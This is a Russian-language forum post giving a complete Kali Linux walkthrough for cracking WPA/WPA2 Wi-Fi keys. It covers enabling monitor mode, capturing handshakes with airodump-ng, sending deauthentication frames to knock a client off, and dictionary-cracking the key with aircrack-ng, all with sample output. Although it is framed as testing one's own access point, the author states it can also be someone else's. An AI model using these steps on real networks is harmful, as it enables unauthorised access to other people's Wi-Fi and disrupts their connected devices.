Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

Взлом wi-fi. Kali linux

Тема в разделе Тематики, создана пользователем D32R, 24 мар 2014.

Войдите для ответа
  1. D32R Новорег

    D32R
    Статус:
    Вне сети
    Сообщения:
    5
    Симпатии:
    1
    Регистрация:
    23.05.14
    D этой статье мы попробуем "проверить на безопасность" свою собственную беспроводную точку (Можно не свою)доступа в интернет. И так, приступим...


    Шаг 1 - запуск беспроводного интерфейса в режиме мониторинга


    Цель этого шага в том, чтобы запустить вашу wi-fi карту в так называемом режиме мониторинга. Данный режим позволяет вам «слушать» все пакеты, т. е. Не только те которые адресованы вашей карте.


    Точная процедура включения режима монитора отличается в зависимости от используемого драйвера. Для определения драйвера, выполните следующую команду:


    airmon-ng


    На машине с Ralink, Atheros и Broadcom система выдаст примерно следующее:


    Interface Chipset Driver


    rausb0 Ralink RT73 rt73


    wlan0 Broadcom b43 - [phy0]


    wifi0 Atheros madwifi-ng


    ath0 Atheros madwifi-ng VAP (parent: wifi0)


    Шаг 1а - Настройка MadWifi -NG


    Сперва остановим ath0, выполнив:


    airmon-ng stop ath0


    Должно быть так:


    Interface Chipset Driver


    wifi0 Atheros madwifi-ng


    ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)


    Выполните команду "iwconfig", чтобы убедиться в том, что больше никаких интерфейсов athX не запущено. Это должно выглядеть примерно так:


    lo no wireless extensions.


    eth0 no wireless extensions.


    wifi0 no wireless extensions.


    Теперь введите следующую команду, чтобы переключить беспроводную карту на канал 9 в режиме мониторинга:


    airmon-ng start wifi0 9


    После этой команды мы должны увидеть что-то похожее на:


    Interface Chipset Driver


    wifi0 Atheros madwifi-ng


    ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)


    Теперь убедимся что наш интерфейс правильно настроен, снова выполняем команду iwconfig


    Ответ должен выглядеть так:


    lo no wireless extensions.


    wifi0 no wireless extensions.


    eth0 no wireless extensions.


    ath0 IEEE 802.11g ESSID:"" Nickname:""


    Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82


    Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3


    Retry:off RTS thr:off Fragment thr:off


    Encryption key:off


    Power Management:off


    Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm


    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0


    Tx excessive retries:0 Invalid misc:0 Missed beacon:0


    Шаг 1b - Настройка драйверов mac80211


    airmon-ng start wlan0 9


    Interface Chipset Driver


    wlan0 Broadcom b43 - [phy0]


    (monitor mode enabled on mon0)


    Обратите внимание, что монитор включен на mon0.


    Стадия 1С — Настройка прочих драйверов


    Для других ( ieee80211 основе ) драйверов, просто выполните следующую команду, чтобы включить режим мониторинга (замените rausb0 вашим именем интерфейса):


    airmon-ng start rausb0 9


    Результат


    Interface Chipset Driver


    rausb0 Ralink rt73 (monitor mode enabled)


    Шаг 2 — Начало. Сбор хэндшейков.


    Целью этого шага является сбор т. н. рукопожатий


    Выполняем:


    airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0


    Где:


    · -с 9 является каналом для беспроводной сети


    · - BSSID 00:14:6 C: 7E : 40:80 является MAC адресом точки доступа.


    · -w psk является префиксом имени файла вывода


    · ath0 является именем нашего интерфейса.


    Вот какой будет вывод если беспроводной клиент подключится к сети:


    CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80


    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


    00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy


    BSSID STATION PWR Lost Packets Probes


    00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116


    А вот так если не подключится:


    CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51


    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


    00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy


    BSSID STATION PWR Lost Packets Probes


    Данный шаг может затянуться, и вам придется ждать пока кто-то из клиентов не подключится к точке доступа. Но думаю это не проблема.


    На основании вывода Airodump-ng в предыдущем шаге, вам удалось определить клиента, который в данный момент подключен. Нам понадобится его MAC-адрес.


    Откройте другой сеанс консоли и введите:


    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0


    Где:


    · -0 средство деаутентификации


    · 1 число деаутентификаций для отправки ( вы можете отправить несколько , если хотите)


    · -a 00:14:6C:7E:40:80 МАС-адрес точки доступа


    · -c 00:0F:B5:FD:FB:C2 МАС-адрес клиента которого мы обнаружили


    · ath0 имя интерфейса


    Вот как будет выглядеть результат команды:


    11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]


    Шаг 4 — Aircrack-ng - взлом предварительного ключа


    На данном этапе нам нужно взломать предварительный ключ WPA/WPA2. Чтобы сделать это, нам понадобиться словарь слов в качестве входных данных.


    Существует небольшой словарь, который поставляется с aircrack-ng - “password.lst”. Будем использовать его.


    Откройте другой сеанс консоли и введите:


    aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap


    Где:


    -w password.lst это имя файла словаря


    *.cap название группы файлов, содержащих перехваченные пакеты . Обратите внимание, что в данном случае мы использовали специальный символ *, чтобы включить несколько файлов.


    Вот типичный вывод, когда нет хэндшейков:


    Opening psk-01.cap


    Opening psk-02.cap


    Opening psk-03.cap


    Opening psk-04.cap


    Read 1827 packets.


    No valid WPA handshakes found.


    Когда это происходит, вы должны либо повторить шаг 3 или ждать дольше, если вы используете пассивный подход.


    Вот таким может быть вывод если хэндшейк будет найден:


    Opening psk-01.cap


    Opening psk-02.cap


    Opening psk-03.cap


    Opening psk-04.cap


    Read 1827 packets.


    # BSSID ESSID Encryption


    1 00:14:6C:7E:40:80 teddy WPA (1 handshake)


    Choosing first network as target.


    Теперь в этот момент, Aircrack-ng начнет пытаться взломать предварительный ключ. В зависимости от скорости вашего процессора и размера словаря, это может занять много времени.


    Вот таким будет вывод при успешном взломе:


    Aircrack-ng 0.8


    [00:00:00] 2 keys tested (37.20 k/s)


    KEY FOUND! [ 12345678 ]


    Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E


    B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD


    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98


    CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40


    FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E


    2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71


    EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


    Ну вот, ключ у нас. Беспроводная сеть проверена на безопасность ;)
     
    24 мар 2014 #1
Загрузка...
Top